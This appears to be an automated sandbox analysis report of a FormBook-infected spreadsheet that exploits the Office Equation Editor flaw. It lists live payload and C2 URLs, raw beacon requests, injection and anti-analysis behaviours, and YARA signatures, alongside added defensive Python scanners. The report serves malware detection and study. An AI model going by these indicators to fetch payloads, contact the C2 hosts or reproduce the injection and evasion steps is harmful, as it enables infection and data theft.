Windows Analysis Report: SWIFT - Copy - Copy.xlsx

Overview

General Information

Sample Name:SWIFT - Copy - Copy.xlsx
Analysis ID:553293
MD5:338cbe8a882d7c941afe2cf895055bd5
SHA1:f081a9d12054b2e1a59d3eae4fa65059db634268
SHA256:097ce13d935a168aa627794fce83fb57b3ad39989c46b574acb13820edbafe4a
Tags:xlsx
Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
.NET source code contains method to dynamically call methods (often used by packers)
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1928 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2568 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • Pcportk28.exe (PID: 2124 cmdline: C:\Users\Public\Pcportk28.exe MD5: 25EE51200E7D86AB2C531748E5C01C72)
      • Pcportk28.exe (PID: 1964 cmdline: C:\Users\Public\Pcportk28.exe MD5: 25EE51200E7D86AB2C531748E5C01C72)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • wininit.exe (PID: 1760 cmdline: C:\Windows\SysWOW64\wininit.exe MD5: B5C5DCAD3899512020D135600129D665)
            • cmd.exe (PID: 2564 cmdline: /c del "C:\Users\Public\Pcportk28.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.healingandhealthy.com/i6ro/"], "decoy": ["annahve.xyz", "636851.com", "cngm7e.com", "iloveapple62.com", "zdbhl.com", "becu84ts.com", "buongpuso.com", "qhwl2017.com", "savarsell.com", "anentbottskeen.com", "vyounglighting.com", "executive-air.net", "elaish.com", "ilmarijuanadispensary.com", "online-bolgar18.com", "qubtantoys.com", "tkspoboys.com", "hackensackfitness.com", "bitcointradel.com", "nightcanteen.com", "skillga.com", "luckyfandom.com", "tonghetaiye.com", "victoriajayde.com", "domainsraj.com", "campervan.love", "sumiyoshiku-inoitami.xyz", "gpawidegroup.com", "potserve.com", "sdunifiednursingcollege.com", "nutcrackernoww.com", "australishomes.com", "salonautostock.com", "carbsupplements.com", "zj7aszamjwe3.biz", "bundesfinanzeministerium-de.com", "petips.xyz", "woodstor.com", "common-criteria-isac.com", "kidskarateonline.com", "fisioletsgo.com", "thelukeliu.com", "boxedwallconsepts.net", "nvgso.com", "hanssuter.com", "proceam.com", "sehatherba.online", "goldenconcept.art", "zaar.solutions", "turmoilgomkww.xyz", "subritulandoando.com", "rashil.digital", "airlesscondimentdispenser.com", "eygtogel021.com", "freeadakahamazon.com", "sahumeriosartesanales.com", "tackle.tools", "sharifulmer.online", "rushpcbtest.info", "epilepsycolorado.online", "birdy3000.com", "aracsozluk.com", "air-watches.com", "xiexingyu.top"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8608: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89a2: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146b5: $sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141a1: $sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147b7: $sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1492f: $sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ba: $sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1341c: $sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa132: $sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19ba7: $sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac4a: $sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x16ad9: $sqlite3step: 68 34 1C 7B E1
  • 0x16bec: $sqlite3step: 68 34 1C 7B E1
  • 0x16b08: $sqlite3text: 68 38 2A 90 C5
  • 0x16c2d: $sqlite3text: 68 38 2A 90 C5
  • 0x16b1b: $sqlite3blob: 68 53 D8 7F 8C
  • 0x16c43: $sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8608: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89a2: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146b5: $sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141a1: $sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147b7: $sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1492f: $sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ba: $sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1341c: $sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa132: $sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19ba7: $sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac4a: $sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

Source | Rule | Description | Author | Strings
5.2.Pcportk28.exe.400000.1.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.2.Pcportk28.exe.400000.1.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x7808: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7ba2: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138b5: $sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x133a1: $sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139b7: $sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b2f: $sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85ba: $sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1261c: $sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9332: $sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18da7: $sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19e4a: $sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.Pcportk28.exe.400000.1.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x15cd9: $sqlite3step: 68 34 1C 7B E1
  • 0x15dec: $sqlite3step: 68 34 1C 7B E1
  • 0x15d08: $sqlite3text: 68 38 2A 90 C5
  • 0x15e2d: $sqlite3text: 68 38 2A 90 C5
  • 0x15d1b: $sqlite3blob: 68 53 D8 7F 8C
  • 0x15e43: $sqlite3blob: 68 53 D8 7F 8C
5.0.Pcportk28.exe.400000.9.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.0.Pcportk28.exe.400000.9.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8608: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89a2: $sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146b5: $sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141a1: $sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147b7: $sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1492f: $sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ba: $sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1341c: $sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa132: $sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19ba7: $sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac4a: $sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
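The two rule families above match on short code idioms rather than on strings. As an added example (not Joe Sandbox, yara-signator or JPCERT code), the Python scanner below decodes what those bytes are and searches a buffer for them: $sequence_0 is an rdtsc delta measurement, the check behind "Tries to detect virtualization through RDTSC time measurements" in the signature list, and the JPCERT strings are `push imm32` instructions whose immediates the rule names after sqlite3 exports (FormBook is generally understood to resolve those by hash; the hashing itself is not on this page and is not modelled). The buffer and the offsets in it are constructed for the demonstration, not taken from a real dump.

```python
"""Scan a memory image for two of the code idioms the YARA hits above key on.
Added example for this report; not Joe Sandbox, yara-signator or JPCERT code,
and the sample buffer is constructed, not a real dump."""
import struct
from typing import Dict, List, Tuple

# $sequence_0 of the yara-signator rule decodes to an rdtsc delta measurement:
#   03 C8     add ecx, eax
#   0F 31     rdtsc
#   2B C1     sub eax, ecx
#   89 45 FC  mov [ebp-4], eax
RDTSC_DELTA_STUB = bytes.fromhex("03C80F312BC18945FC")

# The JPCERT rule's strings are `push imm32` (opcode 68) of three constants.
# The values are the little-endian immediates from the hits above; the names
# are the rule's own string identifiers.
NAMED_CONSTANTS: Dict[int, str] = {
    0xE17B1C34: "sqlite3step",
    0xC5902A38: "sqlite3text",
    0x8C7FD853: "sqlite3blob",
}


def find_all(buf: bytes, pattern: bytes) -> List[int]:
    """Every offset at which `pattern` occurs in `buf` (overlaps allowed)."""
    hits, i = [], buf.find(pattern)
    while i != -1:
        hits.append(i)
        i = buf.find(pattern, i + 1)
    return hits


def find_push_imm32(buf: bytes, wanted: Dict[int, str]) -> List[Tuple[int, int, str]]:
    """(offset, immediate, name) for each `push imm32` whose immediate is in `wanted`."""
    hits = []
    for i in range(len(buf) - 4):
        if buf[i] == 0x68:
            imm = struct.unpack_from("<I", buf, i + 1)[0]
            if imm in wanted:
                hits.append((i, imm, wanted[imm]))
    return hits


def scan(buf: bytes) -> Dict[str, list]:
    """Run both scanners over one buffer."""
    return {
        "rdtsc_stub": find_all(buf, RDTSC_DELTA_STUB),
        "named_pushes": find_push_imm32(buf, NAMED_CONSTANTS),
    }


def build_sample() -> bytes:
    """Constructed 256-byte buffer: NOP filler, the rdtsc stub at two offsets,
    the three pushes back to back, and one push of an unrelated immediate
    that must not be reported."""
    buf = bytearray(b"\x90" * 0x100)
    for off in (0x20, 0x60):
        buf[off:off + len(RDTSC_DELTA_STUB)] = RDTSC_DELTA_STUB
    pushes = b"".join(b"\x68" + struct.pack("<I", c) for c in NAMED_CONSTANTS)
    buf[0xA0:0xA0 + len(pushes)] = pushes
    buf[0xD0:0xD5] = b"\x68" + struct.pack("<I", 0x41414141)
    return bytes(buf)


if __name__ == "__main__":
    for kind, hits in scan(build_sample()).items():
        print(kind, [hex(h[0]) if isinstance(h, tuple) else hex(h) for h in hits])
```

The push scan is deliberately naive (it treats every 0x68 byte as an opcode), which is also how the YARA rule behaves; on a real dump it would be run over the unpacked image, such as the 5.2.Pcportk28.exe.400000.1.unpack region listed above, where the same constants appear twice because the routine is duplicated.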

          Sigma Overview

          Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection | Author: Joe Security | Data: DestinationIp: 131.153.37.4, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2568, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2568, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\i4L[1].exe

          System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started | Author: Florian Roth | Data: Command: C:\Users\Public\Pcportk28.exe, CommandLine: C:\Users\Public\Pcportk28.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Pcportk28.exe, NewProcessName: C:\Users\Public\Pcportk28.exe, OriginalFileName: C:\Users\Public\Pcportk28.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2568, ProcessCommandLine: C:\Users\Public\Pcportk28.exe, ProcessId: 2124
Sigma detected: Execution from Suspicious Folder
Source: Process started | Author: Florian Roth | Data: Command: C:\Users\Public\Pcportk28.exe, CommandLine: C:\Users\Public\Pcportk28.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Pcportk28.exe, NewProcessName: C:\Users\Public\Pcportk28.exe, OriginalFileName: C:\Users\Public\Pcportk28.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2568, ProcessCommandLine: C:\Users\Public\Pcportk28.exe, ProcessId: 2124
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process started | Author: vburov | Data: Command: C:\Windows\SysWOW64\wininit.exe, CommandLine: C:\Windows\SysWOW64\wininit.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wininit.exe, NewProcessName: C:\Windows\SysWOW64\wininit.exe, OriginalFileName: C:\Windows\SysWOW64\wininit.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1764, ProcessCommandLine: C:\Windows\SysWOW64\wininit.exe, ProcessId: 1760
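The three process-creation hits above, together with the two EQNEDT32.EXE rules in the Exploits section, reduce to a handful of conditions on Sysmon-style process, network and file events. The Python below is an added example (not Joe Sandbox code and not the Sigma project's rule files) that replays those conditions over events constructed from this report's process tree and Sigma evidence. The suspicious folders and system binary names beyond the ones this report shows (C:\Users\Public\ and wininit.exe) are assumptions, as is the benign control event.

```python
"""Replay the Sigma-style rules reported above over constructed Sysmon-like
events (EventID 1 process create, 3 network connect, 11 file create).
Added example for this report; not Joe Sandbox code and not the Sigma
project's rule files. Event values come from the process tree and Sigma
hits on this page; the benign control event is constructed."""
import ntpath
from typing import Dict, List, Tuple

# C:\Users\Public\ is the folder seen in this report; the other two are
# assumptions in the spirit of the public "suspicious folder" rule.
SUSPICIOUS_FOLDERS = ("c:\\users\\public\\", "c:\\windows\\temp\\", "c:\\perflogs\\")
# Only wininit.exe is observed here; the rest are assumed system binaries
# that should likewise never be started from a user's explorer.exe.
SYSTEM_BINARIES = {"wininit.exe", "winlogon.exe", "lsass.exe", "services.exe", "csrss.exe", "smss.exe"}
EXPECTED_PARENT_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def _dir(path: str) -> str:
    """Lower-cased directory of a Windows path, with trailing backslash."""
    return ntpath.dirname(path.lower()) + "\\"


def evaluate(event: Dict) -> List[str]:
    """Names of the rules that match one event (empty list if none)."""
    hits: List[str] = []
    image = event.get("Image", "").lower()
    if event["EventID"] == 1:
        parent = event.get("ParentImage", "").lower()
        # Any child of the Equation Editor is a CVE-2017-11882 dropper candidate.
        if parent.endswith("\\eqnedt32.exe"):
            hits.append("Droppers Exploiting CVE-2017-11882")
        if image.startswith(SUSPICIOUS_FOLDERS):
            hits.append("Execution from Suspicious Folder")
        # A system binary whose parent does not live in a system directory.
        if ntpath.basename(image) in SYSTEM_BINARIES and not _dir(parent).startswith(EXPECTED_PARENT_DIRS):
            hits.append("Windows Processes Suspicious Parent Directory")
    elif event["EventID"] == 3:
        if image.endswith("\\eqnedt32.exe") and event.get("Initiated"):
            hits.append("EQNEDT32.EXE connecting to internet")
    elif event["EventID"] == 11:
        if image.endswith("\\eqnedt32.exe"):
            hits.append("File Dropped By EQNEDT32EXE")
    return hits


def scan(events: List[Dict]) -> List[Tuple[int, int, str]]:
    """(EventID, ProcessId, rule) for every rule hit across the event stream."""
    return [(e["EventID"], e["ProcessId"], rule) for e in events for rule in evaluate(e)]


EQNEDT32 = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
EVENTS = [
    {"EventID": 1, "ProcessId": 2124, "Image": r"C:\Users\Public\Pcportk28.exe", "ParentImage": EQNEDT32},
    {"EventID": 1, "ProcessId": 1760, "Image": r"C:\Windows\SysWOW64\wininit.exe", "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 3, "ProcessId": 2568, "Image": EQNEDT32, "Initiated": True, "DestinationIp": "131.153.37.4", "DestinationPort": 80},
    {"EventID": 11, "ProcessId": 2568, "Image": EQNEDT32,
     "TargetFilename": r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\i4L[1].exe"},
    # Constructed benign control: Notepad started from Explorer must stay silent.
    {"EventID": 1, "ProcessId": 3000, "Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for hit in scan(EVENTS):
        print(hit)
```

The parent-directory rule is the one to tune: explorer.exe legitimately lives in C:\Windows, so it is the image name set, not the parent path, that keeps this from firing on ordinary user activity.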

          Jbx Signature Overview

          AV Detection:

Found malware configuration
Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.healingandhealthy.com/i6ro/"], "decoy": ["annahve.xyz", "636851.com", "cngm7e.com", "iloveapple62.com", "zdbhl.com", "becu84ts.com", "buongpuso.com", "qhwl2017.com", "savarsell.com", "anentbottskeen.com", "vyounglighting.com", "executive-air.net", "elaish.com", "ilmarijuanadispensary.com", "online-bolgar18.com", "qubtantoys.com", "tkspoboys.com", "hackensackfitness.com", "bitcointradel.com", "nightcanteen.com", "skillga.com", "luckyfandom.com", "tonghetaiye.com", "victoriajayde.com", "domainsraj.com", "campervan.love", "sumiyoshiku-inoitami.xyz", "gpawidegroup.com", "potserve.com", "sdunifiednursingcollege.com", "nutcrackernoww.com", "australishomes.com", "salonautostock.com", "carbsupplements.com", "zj7aszamjwe3.biz", "bundesfinanzeministerium-de.com", "petips.xyz", "woodstor.com", "common-criteria-isac.com", "kidskarateonline.com", "fisioletsgo.com", "thelukeliu.com", "boxedwallconsepts.net", "nvgso.com", "hanssuter.com", "proceam.com", "sehatherba.online", "goldenconcept.art", "zaar.solutions", "turmoilgomkww.xyz", "subritulandoando.com", "rashil.digital", "airlesscondimentdispenser.com", "eygtogel021.com", "freeadakahamazon.com", "sahumeriosartesanales.com", "tackle.tools", "sharifulmer.online", "rushpcbtest.info", "epilepsycolorado.online", "birdy3000.com", "aracsozluk.com", "air-watches.com", "xiexingyu.top"]}
Yara detected FormBook
Source: Yara match | File source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://mikeloayza.com/E9/i4L.exe | Avira URL Cloud: Label: malware
Source: https://mikeloayza.com/E9/i4L.exe | Avira URL Cloud: Label: malware
Machine Learning detection for sample
Source: SWIFT - Copy - Copy.xlsx | Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\Public\Pcportk28.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\i4L[1].exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 5.2.Pcportk28.exe.400000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.Pcportk28.exe.400000.5.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.Pcportk28.exe.400000.9.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.Pcportk28.exe.400000.7.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\Pcportk28.exe
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown | HTTPS traffic detected: 131.153.37.4:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: Binary string: wininit.pdb | source: Pcportk28.exe, 00000005.00000002.519519469.0000000000479000.00000004.00000020.sdmp, Pcportk28.exe, 00000005.00000002.519453016.0000000000380000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdb | source: Pcportk28.exe, Pcportk28.exe, 00000005.00000002.520658303.00000000009C0000.00000040.00000001.sdmp, Pcportk28.exe, 00000005.00000003.484779384.0000000000550000.00000004.00000001.sdmp, Pcportk28.exe, 00000005.00000002.519678082.0000000000840000.00000040.00000001.sdmp, Pcportk28.exe, 00000005.00000003.485865718.00000000006B0000.00000004.00000001.sdmp, wininit.exe
Source: Binary string: ILi.pdb | source: Pcportk28.exe, Pcportk28.exe, 00000005.00000000.483141980.00000000010E2000.00000020.00020000.sdmp
Potential document exploit detected (performs DNS queries)
Source: global traffic | DNS query: name: mikeloayza.com
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\Pcportk28.exe | Code function: 4x nop then pop ebx | 5_2_00406AB6
Source: C:\Users\Public\Pcportk28.exe | Code function: 4x nop then pop edi | 5_2_0040C3FB
Source: C:\Users\Public\Pcportk28.exe | Code function: 4x nop then pop edi | 5_2_0041565B
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 4x nop then pop edi | 7_2_000EC3FB
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 4x nop then pop edi | 7_2_000F565B
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 4x nop then pop ebx | 7_2_000E6AB6
Potential document exploit detected (unknown TCP traffic)
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 131.153.37.4:80
Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 131.153.37.4:443

          Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.executive-air.net
Source: C:\Windows\explorer.exe | Domain query: www.bitcointradel.com
Source: C:\Windows\explorer.exe | Network Connect: 162.0.209.73 80
Source: C:\Windows\explorer.exe | Domain query: www.freeadakahamazon.com
Source: C:\Windows\explorer.exe | Network Connect: 118.67.131.217 80
Source: C:\Windows\explorer.exe | Domain query: www.fisioletsgo.com
Source: C:\Windows\explorer.exe | Domain query: www.luckyfandom.com
Source: C:\Windows\explorer.exe | Network Connect: 216.239.34.21 80
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.healingandhealthy.com/i6ro/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: ACPCA ACPCA
Source: Joe Sandbox View | ASN Name: CLEAR-AS-APClearNetworksPtyLtdAU CLEAR-AS-APClearNetworksPtyLtdAU
Source: Joe Sandbox View | ASN Name: SSASN2US SSASN2US
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
HTTP GET or POST without a user agent
Source: global traffic | HTTP traffic detected: GET /i6ro/?1bwlC=EvZLIa9n10nRxiOVjDAbNaraserFHY+vFXfn78IjngAHha///qY0HtL3OeQWM3V4VGGKJg==&Lvkth=7nk0PH684p HTTP/1.1 | Host: www.fisioletsgo.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /i6ro/?1bwlC=v8wCmtdiFaomFbCqPmTRfuzV09iQsBcARN7AuQ2Z2cmxW4qEZgdAIsAR7HDX+F8RHnJ1WA==&Lvkth=7nk0PH684p HTTP/1.1 | Host: www.bitcointradel.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /i6ro/?1bwlC=/cyLrpDDSN6YuFUytusJvMs1Fa8HKgEew+X60dN8PRm9IS30Y+vwImEN4uFaxkThXcWLPQ==&Lvkth=7nk0PH684p HTTP/1.1 | Host: www.executive-air.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /i6ro/?1bwlC=p0eSlAztBYtTxVFAHr6whY3a3/Gvse9lKulyfm76J1CiWi63XOqEOX0vBd7zzyHot2+Q1w==&Lvkth=7nk0PH684p HTTP/1.1 | Host: www.luckyfandom.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View | IP Address: 118.67.131.217 118.67.131.217
Uses a known web browser user agent for HTTP communication
